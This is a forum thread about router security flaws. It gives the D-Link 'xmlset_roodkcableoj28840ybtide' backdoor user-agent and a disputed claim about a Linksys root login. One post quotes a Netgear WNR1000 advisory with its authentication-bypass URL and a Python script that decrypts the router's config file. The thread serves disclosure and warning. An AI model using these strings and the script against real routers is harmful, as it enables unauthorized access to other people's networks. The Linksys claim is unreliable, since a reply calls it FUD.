• This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn more.

Do you have D-Link router ? If so, stop using it - You're not safe

Adam Howard

Well-known member
#1
The Web interface for some D-Link routers could be accessed if a browser's user agent string is set to xmlset_roodkcableoj28840ybtide

Curiously, if the second half of the user agent string is reversed and the number is removed, it reads "edit by joel backdoor," suggesting it was intentionally placed there.

The affected models likely include D-Link's DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240 and possibly the DIR-615. The same firmware is also used in the BRL-04UR and BRL-04CW routers

Personally, I would recommend a TP-Link Router (reff link) as a replacement. That's basically what I use.
 
Last edited:

Adam Howard

Well-known member
#2
Got a Linksys router and think you're safe? :cautious:
Even changed the default user name and password? :cautious:
Or perhaps you turned off remote sign-in in order to be safer? :cautious:

Feeling safe? :sneaky:

Type in 192.168.1.1 or even (better) your remote IP address (the one your ISP has assigned you), since that is what anyone else would use to reach you..... (whatismyip.com)

user name:
root
password: admin

or


user name: root
password: root



Your user name and password doesn't mean anything. Depending on your model, you just logged in as root, by passing whatever user name and password you had before (and on some models even if you had remote log-in turned off).
:eek:
 

infis

Well-known member
#6
Use Mikrotik routers. These are very advanced routers with convenient management. And about D-Link forget: it is a lot of bugs, badly are set up, overheat, poor performance.
 

SneakyDave

Well-known member
#7
Got a Linksys router and think you're safe? :cautious:
Even changed the default user name and password? :cautious:
Or perhaps you turned off remote sign-in in order to be safer? :cautious:

Feeling safe? :sneaky:

Type in 192.168.1.1 or even (better) your remote IP address (the one your ISP has assigned you), since that is what anyone else would use to reach you..... (whatismyip.com)
user name: root
password: admin
or

user name: root
password: root



Your user name and password doesn't mean anything. Depending on your model, you just logged in as root, by passing whatever user name and password you had before (and on some models even if you had remote log-in turned off).
:eek:
FUD, from December 2012. :rolleyes:
http://thenextweb.com/insider/2013/...t-vulnerability-giving-attackers-full-access/
 

Adam Howard

Well-known member
#8
What, no NETGEAR backdoors? Drat ;)
Got Netgear and feeling safe? :cautious:

http://xenforo.com/community/thread...op-using-it-youre-not-safe.61738/#post-655761

^ Some Netgrear are also affected by the root exploit. :eek: But this one isn't as clear cut as Linksys. :confused: You could have two of the same kind of routers (model and firmware) & maybe only 1 of them (or both); could be breached remotely using root.

This suggest that it maybe a chip set difference. Because at one time Netgear was in the middle of changing where those were manufactured.

So try it and play Russian Roulette.... Feeling lucky? :cautious:

I still recommend TP-Link Routers. Nothing found in them thus far.
 
Last edited:

Adam Howard

Well-known member
#10
I have Netgear, its great, but not Netgreat.
I'd like to blame auto correct on that one, but nope, totally me. I had a friend once who kept calling them that to be silly. And from time to time, when I'm typing away fast.... I end up doing it.

Thanks for the heads up. Fixed it. :)
 

EQnoble

Well-known member
#13
What, no NETGEAR backdoors? Drat ;)
not so much a back door...but can still be a problem...

Authentication bypass on Netgear WNR1000
========================================

[ADVISORY INFORMATION]
Title: Authentication bypass on Netgear WNR1000
Discovery date: 10/11/2012
Release date: 29/03/2013
Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari)

[VULNERABILITY INFORMATION]
Class: Authentication bypass, weak encryption

[AFFECTED PRODUCTS]
This security vulnerability affects the following products and firmware
versions:
* Netgear WNR1000v3, firmware version < 1.0.2.60

Other products and firmware versions are probably also vulnerable, but they
were not checked.

[VULNERABILITY DETAILS]
The web server running on the affected devices is subject to an authentication
bypass issue that allows attacker to gain administrative access, circumventing
existing authentication mechanisms.

Strictly speaking, the web server skips authentication checks for some URLs,
such as those that contain the substring ".jpg" (without quotes). As a
consequence, an attacker can retrieve the current device configuration by
accessing the following URL:

http://<target-ip-address>/NETGEAR_fwpt.cfg?.jpg

The resulting configuration file is encrypted. However the device implements a
trivial encryption scheme, that can be reversed quite easily. From the
configuration file, attackers can extract, among the other things, the
clear-text password for the "admin" user.

A Python procedure that implements the aforementioned encryption scheme
follows (the code of this PoC is inefficient and is quite a mess):

<cut>
import pyDes
import os, sys

# Encryption key is a slightly variation of "NtgrBak"
KEY = [0x56-8, 0x74, 0x67, 0x72, 0x42, 0x61, 0x6b, 0x00]

def derive_des_key(ascii_key):
def extract_by_offset(offset):byte_index = offset >> 3bit_index = byte_index << 3

v0 = (ascii_key[byte_index] << 8) | ascii_key[byte_index+1]v1 = 8 - (offset - bit_index)v0 >>= v1return v0 & 0xfe

k = ""
for i in range(0, 7*8, 7):
k += chr(extract_by_offset(i))
return k

def decrypt_block(block, key_bytes):
k = derive_des_key(key_bytes)
des = pyDes.des(k, pyDes.ECB)
r = des.decrypt(block)
return r

def main():
data = sys.stdin.read()
assert (len(data) % 8) == 0

current_key = KEY[:]

r = ""
for i in range(0, len(data), 8):
current_key[0] += 8
if current_key[0] > 0xff:
current_key[0] = current_key[0] - 0x100
current_key[1] += 1

block = data[i:i+8]
d = decrypt_block(block, current_key)

r += d

sys.stdout.write(r)
</cut>


[REMEDIATION]
This issue has been addressed by Netgear with firmware version 1.0.2.60.

[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.
 

EQnoble

Well-known member
#15
I use Linksys... USED TO LOVE THEM...

Now I hate them... all because of this ****ty Cisco Cloud Connect firmware.
I won't go so far as to say I hate them...but yeah there is no reason they need firmware updates that let them track my browsing history at the gateway to my home network
 

EQnoble

Well-known member
#17
If you really want to secure your router, hide the SSID, implement a MAC Address filter, use WPA2, and disallow logins to the admin interface through wifi. Most home routers should have those features and they're pretty easy to set up.
Not broadcasting the ssid does nothing really unless you are talking about the cases where people don't change the default password and someone is being a nosey pest as someone who knows what they are doing is going to see your bssid, the channel you use and eventually your essid no matter what you do...and then to a slightly skilled person the MAC filter is useless as well as a couple of pings, a handshake or two and someone can just borrow a whilelisted MAC addy already on your network and then gain access using your passphrase or key which they can get in plain text with relative ease if they have already done any of this.

Either way, even if someone doesn't do any of that...if your router has a vulnerability such as accepting random requests for plain text config files it doesn't really matter what settings you set.

The odd thing is when someones network gets hacked...it is highly probable that the only reason that they were able to gain access to the wireless network in the first place is because the router was communicating with client over air.

Wireless networks are weak sauce in general.